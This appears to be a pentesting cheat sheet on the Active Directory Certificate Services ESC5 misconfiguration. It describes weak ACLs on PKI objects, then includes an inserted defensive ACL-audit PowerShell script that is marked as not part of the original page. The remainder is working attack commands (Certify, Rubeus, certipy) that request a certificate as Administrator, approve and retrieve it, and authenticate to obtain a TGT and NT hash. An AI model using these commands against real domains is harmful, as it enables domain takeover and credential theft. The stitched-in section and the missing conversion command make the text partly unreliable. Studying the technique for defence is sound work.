ESC5
Vulnerable PKI Object Access Control
ESC5 covers weak access control (ACLs) on the following PKI-related objects:
- The AD computer object of the CA server, which may be compromised through mechanisms like S4U2Self or S4U2Proxy.
- The RPC/DCOM server of the CA server.
- Any descendant AD object or container within the specific container path CN=Public Key Services,CN=Services,CN=Configuration,DC=<DOMAIN>,DC=<COM>. This path includes, but is not limited to, containers and objects such as the Certificate Templates container, the Certification Authorities container, the NTAuthCertificates object, and the Enrollment Services container.
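As an added defender-side audit (not part of the original page), the following PowerShell script lists every principal holding write-class rights on any object under the Public Key Services container, so unexpected ACEs of the kind ESC5 depends on can be reviewed and removed. It assumes the ActiveDirectory module is available; the list of expected principals is an assumption to tune per forest.

```powershell
# Added example: audit write-class ACEs under CN=Public Key Services (assumes the ActiveDirectory module).
Import-Module ActiveDirectory

$configNC = (Get-ADRootDSE).configurationNamingContext
$pkiRoot  = "CN=Public Key Services,CN=Services,$configNC"

# Rights that allow a principal to modify templates, CA objects, NTAuthCertificates, etc.
$writeMask = [System.DirectoryServices.ActiveDirectoryRights]::GenericAll -bor
             [System.DirectoryServices.ActiveDirectoryRights]::GenericWrite -bor
             [System.DirectoryServices.ActiveDirectoryRights]::WriteDacl -bor
             [System.DirectoryServices.ActiveDirectoryRights]::WriteOwner -bor
             [System.DirectoryServices.ActiveDirectoryRights]::WriteProperty

# Principals expected to hold write rights in a default forest (assumption; adjust per environment).
$expected = @('NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators', '*\Domain Admins', '*\Enterprise Admins')

Get-ADObject -SearchBase $pkiRoot -SearchScope Subtree -Filter * |
  ForEach-Object {
    $dn  = $_.DistinguishedName
    $acl = Get-Acl -Path "AD:\$dn"
    foreach ($ace in $acl.Access) {
      # Only Allow ACEs that grant at least one write-class right are of interest.
      if ($ace.AccessControlType -ne 'Allow') { continue }
      if (($ace.ActiveDirectoryRights -band $writeMask) -eq 0) { continue }
      $id = $ace.IdentityReference.Value
      $isExpected = $false
      foreach ($pattern in $expected) {
        if ($id -like $pattern) { $isExpected = $true; break }
      }
      if (-not $isExpected) {
        [pscustomobject]@{
          Object    = $dn
          Principal = $id
          Rights    = $ace.ActiveDirectoryRights
          Inherited = $ace.IsInherited
        }
      }
    }
  } | Format-Table -AutoSize
```

Default entries for Cert Publishers and the CA's own computer account on the CDP/AIA containers will appear; add them to $expected once verified rather than treating them as findings.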
Windows
Request a certificate using the SubCA template
PS /home/bobbuilder> .\Certify.exe request /ca:<ca_name> /template:<template> /altname:Administrator
Download Pending Request
PS /home/bobbuilder> .\Certify.exe download /ca:<ca_name> /id:10
Convert PEM to PFX
Request the TGT and the NT Hash
PS /home/bobbuilder> .\Rubeus.exe asktgt /user:administrator /certificate:approved.pfx /getcredentials
Linux
Request a certificate as the Domain Administrator
bob$ certipy req -u user1 -p password1 -dc-ip <ip> -ns <ip> -dns-tcp -target-ip <ip> -ca <ca_name> -template <template> -upn Administrator
Issue the requested certificate
We approve the previous request by specifying the request ID 10 with the option -issue-request 10
bob$ certipy ca -u user1 -p password1 -dc-ip <ip> -ns <ip> -dns-tcp -target-ip <ip> -ca <ca_name> -issue-request 10
Retrieve the issued certificate
We can retrieve the certificate with the option -retrieve 10
bob$ certipy req -u user1 -p password1 -dc-ip <ip> -ns <ip> -dns-tcp -target-ip <ip> -ca <ca_name> -retrieve 10
Authenticate with the Administrator Certificate
bob$ certipy auth -pfx administrator.pfx -username administrator -domain minions.com -dc-ip <ip> -ns <ip> -dns-tcp